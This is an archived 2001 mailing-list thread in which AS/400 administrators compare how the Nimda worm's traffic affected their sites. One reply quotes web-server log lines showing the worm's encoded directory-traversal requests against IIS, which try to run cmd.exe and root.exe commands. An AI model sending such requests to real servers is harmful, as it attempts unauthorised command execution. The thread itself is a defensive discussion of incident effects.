|
midrange.com
This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.
--
[ Picked text/plain from multipart/alternative ]
We also saw an increase in traffic. No
impact on our extranet site.
Now for our PCS systems that use IIS for
presentation and our SMTP gateway (which inadvertently had IIS running) it's
a different story. Good news is, it didn't affect my job. Well unless you
count the three days we couldn't use our Exchange SMTP gateway and didn't
have outside mail.........
Michael Crump
Saint-Gobain Containers
1509 S. Macedonia Ave.
Muncie, IN 47302
(765)741-7696
(765)741-7012 f
(800)428-8642
mailto:mike.crump@saint-gobain.com
"Joel R. Cochran" <jrc@masi-brac.com>
10/04/01 02:51 PM
Please respond to midrange-l
To: midrange-l@midrange.com
cc:
Subject: RE: NIMDA Virus - Anyone been affected by it ?
Ditto, increased our traffic by 300%. Mind
you it didn't phase our machine
or appear to have any effect on our users,
but I couldn't figure out how to
prevent it. Thank goodness for the good old
HTTP Server.
For those who aren't sure what we are
referring to, here is a snippet from
the HTTP log file. We were all sitting
around the office laughing at these
stupid Windows requests on a 400...
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404
232
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404
232
"GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
"GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
"GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
"GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
"GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404
232
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404
232
"GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
"GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
"GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
"GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
"GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
This went on for over a week from literally
hundreds of IP addresses. Our
ISP had no idea what to do, so we just let
it run it's course. You'll
notice, of course, that the response code on
each one of these is 404, so
they never hurt anything.
Joel R. Cochran
Director of Internet Services
VamaNet.com
800-480-8810 (va toll free)
540-885-8050 (phone)
540-886-1589 (fax)
www.vamanet.com
mailto:custservice@vamanet.com
>-----Original Message-----
>From: Larryt222@aol.com
[mailto:Larryt222@aol.com]
>Sent: Thursday, October 04, 2001 3:09 PM
>To: midrange-l@midrange.com
>Subject: Re: NIMDA Virus - Anyone been
affected by it ?
>
>
>Why NIMDA did nothing to our 400, the site
was hit an average
>of 8,000 times a day which caused our
stores to get slower
>response because of all the trafic on the
line. NIMDA was
>trying to execute NT code which as you know
does not execute
>on the 400. It appears that once they have
an IP address NIMDA
>keeps on trying to contact that IP.
>
>Larry T.
>_______________________________________________
>This is the Midrange Systems Technical
Discussion (MIDRANGE-L)
>mailing list
>To post a message email:
MIDRANGE-L@midrange.com
>To subscribe, unsubscribe, or change list
options,
>visit:
http://lists.midrange.com/cgi-bin/listinfo/midrange-l
>or email: MIDRANGE-L-request@midrange.com
>Before posting, please take a moment to
review the archives
>at http://archive.midrange.com/midrange-l.
>
_______________________________________________
This is the Midrange Systems Technical
Discussion (MIDRANGE-L) mailing list
To post a message email:
MIDRANGE-L@midrange.com
To subscribe, unsubscribe, or change list
options,
visit:
http://lists.midrange.com/cgi-bin/listinfo/midrange-l
or email: MIDRANGE-L-request@midrange.com
Before posting, please take a moment to
review the archives
at http://archive.midrange.com/midrange-l.
As an Amazon Associate we earn from qualifying purchases.
This mailing list archive is Copyright 1997-2025 by midrange.com and David Gibbs as a compilation work. Use of the archive is restricted to research of a business or technical nature. Any other uses are prohibited. Full details are available on our policy page. If you have questions about this, please contact [javascript protected email address].
Operating expenses for this site are earned using the Amazon Associate program and Google Adsense.
